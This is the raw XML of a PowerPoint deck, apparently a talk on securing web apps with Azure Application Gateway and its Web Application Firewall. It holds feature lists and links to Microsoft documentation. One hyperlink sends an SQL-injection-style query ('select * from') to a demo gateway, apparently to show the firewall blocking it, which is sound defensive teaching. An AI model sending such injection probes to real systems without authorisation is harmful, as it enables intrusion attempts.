            <a:fld id="{CB810381-90C7-435A-898E-9A861C0BEAF3}" type="slidenum">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270019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CB810381-90C7-435A-898E-9A861C0BEAF3}" type="slidenum">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99141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12/16/2022</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244164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12/16/2022</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3047323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12/16/2022</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‹Nr.›</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9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12/16/2022</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8106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12/16/2022</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338523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12/16/2022</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182275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12/16/2022</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313362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12/16/2022</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192347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12/16/2022</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232042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12/16/2022</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116984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12/16/2022</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‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235739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12/16/2022</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‹Nr.›</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16829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65" r:id="rId6"/>
    <p:sldLayoutId id="2147483761" r:id="rId7"/>
    <p:sldLayoutId id="2147483762" r:id="rId8"/>
    <p:sldLayoutId id="2147483763" r:id="rId9"/>
    <p:sldLayoutId id="2147483764" r:id="rId10"/>
    <p:sldLayoutId id="2147483766"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azure/application-gateway/overview-v2#feature-comparison-between-v1-sku-and-v2-sk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learn.microsoft.com/en-us/azure/application-gateway/ssl-overview" TargetMode="Externa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owasp.org/Top1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learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rul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agw-demo-02.northeurope.cloudapp.azure.com/?query=%27select%20*%20from%27"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hyperlink" Target="https://svgsilh.com/de/image/1500642.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId12"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14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.sv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learn.microsoft.com/en-us/azure/application-gateway/application-gateway-probe-overview" TargetMode="Externa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agw-demo-04.northeurope.cloudapp.azure.com/shop/"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hyperlink" Target="https://agw-demo-04.northeurope.cloudapp.azure.com/Identity/Account/Login" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://agw-demo-04.northeurope.cloudapp.azure.com/images/brand.png" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webshop-agw-demo-04...azure.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://agw-demo-04....azure.com/shop/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://agw-demo-04.northeurope.cloudapp.azure.com/lib/jquery/jquery.js" TargetMode="External"/><Relationship Id="rId9"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hyperlink" Target="https://webshop-agw-demo-02.azurewebsites.net/" TargetMode="External"/><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hyperlink" Target="https://webshop-agw-demo-02.azurewebsites.net/shop"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news.microsoft.com/build2022"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38.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/azure/application-gateway/rewrite-http-headers-url" TargetMode="Externa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3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hyperlink" Target="https://azure.microsoft.com/en-us/pricing/calculator"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MicrosoftDocs/azure-docs/issues/33601"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hyperlink" Target="https://azure.microsoft.com/en-us/pricing/calculator"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hyperlink" Target="https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/application-gateway-security-baseline" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><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slides/_rels/slide41.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59.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.svg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/application-gateway-security-baseline" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.svg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.svg"/></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hyperlink" Target="https://learn.microsoft.com/en-us/azure/application-gateway/ssl-overview"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learn.microsoft.com/de-de/azure/application-gateway/configure-web-app" TargetMode="External"/><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hyperlink" Target="https://learn.microsoft.com/en-us/azure/application-gateway/key-vault-certs" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.sv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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.sv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s://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-faq" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><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hyperlink" Target="https://azure.microsoft.com/en-us/pricing/details/ddos-protection/#pricing"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hyperlink" Target="https://learn.microsoft.com/en-us/azure/application-gateway/custom-error" TargetMode="Externa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image" Target="../media/image77.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freepik.com/free-vector/500-internal-server-error-concept-illustration_8030427.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freepik.com/free-vector/403-error-forbidden-with-police-concept-illustration_8030434.htm"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learn.microsoft.com/en-us/azure/application-gateway/overview-v2#feature-comparison-between-v1-sku-and-v2-sk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0B7304F-E6C0-414A-A6DA-6D87129AC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26D364-8EE0-FF07-C5D2-7DEE38B1108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="email">
            <a:alphaModFix amt="60000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5F8559-A5F9-8FF1-2D90-783278563C80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79512" y="66262"/>
            <a:ext cx="12013097" cy="4974636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Application GAteway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Untertitel 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1106105-E1F8-5B33-0E06-795097CEB731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="5104691"/>
            <a:ext cx="9929231" cy="794148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="de-CH">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure in the Cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1163B6C4-0500-4B1A-9149-4A6C7EDAF1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015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descr="Digitale Kunst von einem roten Regenschirm im Regen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C941AE-0492-A075-1D50-2680C367FA60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="email">
            <a:alphaModFix amt="60000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3EDD53-8DC5-8BDC-3E85-AD12073FCD3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="1069848"/>
            <a:ext cx="10084271" cy="1820488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="6000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Gateway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 15">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90B13CC-0D42-64A6-773C-87FFE58EB9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="3001297"/>
            <a:ext cx="3695700" cy="2949676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2208670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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF657E0C-D3F1-3BD9-E455-795E13ED44AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="2112264"/>
            <a:ext cx="9922764" cy="4174236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and SSL termination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autoscaling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zone redundancy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static VIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ingress Controller for AKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL-based routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple-site hosting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session affinity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and HTTP/2 traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection draining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom error pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rewrite HTTP headers and URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Key Vault integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Private Link support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAF custom rules and policy associations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mutual Authentication (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Titel 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BE68A2-5894-A271-5FA9-974899F92CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rechteck: abgerundete Ecken 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B19A50-637A-AEA4-19E1-D1BB89E94CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2736544" y="257067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3" name="Rechteck: abgerundete Ecken 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35AA6A9-19DD-97BD-9FF3-0AA3430AB84A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3288994" y="297707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6" name="Rechteck: abgerundete Ecken 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5CB97F-46EA-CE0B-5672-FD837597A152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2525571" y="3406492"/>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7" name="Rechteck: abgerundete Ecken 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575FF611-6821-42A1-31E5-4A1BD1922974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962094" y="380257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8" name="Rechteck: abgerundete Ecken 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E7F6749-142A-CF64-4300-2F45D141AE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173067" y="4224331"/>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9" name="Rechteck: abgerundete Ecken 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0C6349-9A80-7F50-5034-1BE16D33EA7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9384994" y="5456605"/>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10" name="Rechteck: abgerundete Ecken 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A01E4A2-5F00-032A-12CD-F2F8DFA2F0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559744" y="505352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11" name="Rechteck: abgerundete Ecken 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957AB2D8-B0B0-AAA1-2494-30480DAEF667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8381694" y="462807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12" name="Rechteck: abgerundete Ecken 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A63DAC-2CEC-69A5-7595-3179C36C4767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9118294" y="4224331"/>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13" name="Rechteck: abgerundete Ecken 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCE51C8-E5CB-F32D-E531-7D6CD628A58B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9649919" y="3406492"/>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21" name="Textfeld 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27FBAD0F-7B47-AA4E-F94D-7BEAD9BEEBA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088134" y="6439064"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/overview-v2</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2964675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FF7842D-65AB-826B-7B12-090DCC084244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069646" y="1092848"/>
            <a:ext cx="9958753" cy="680144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="all" dirty="0"/>
              <a:t>Protecting our System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 2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1185999"/>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69C70825-A395-E900-1048-AD4148407910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="2846575"/>
            <a:ext cx="7280266" cy="3439925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397274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1272E-0D33-AEA8-900B-058F0238BE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>TLS/SSL on AGW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
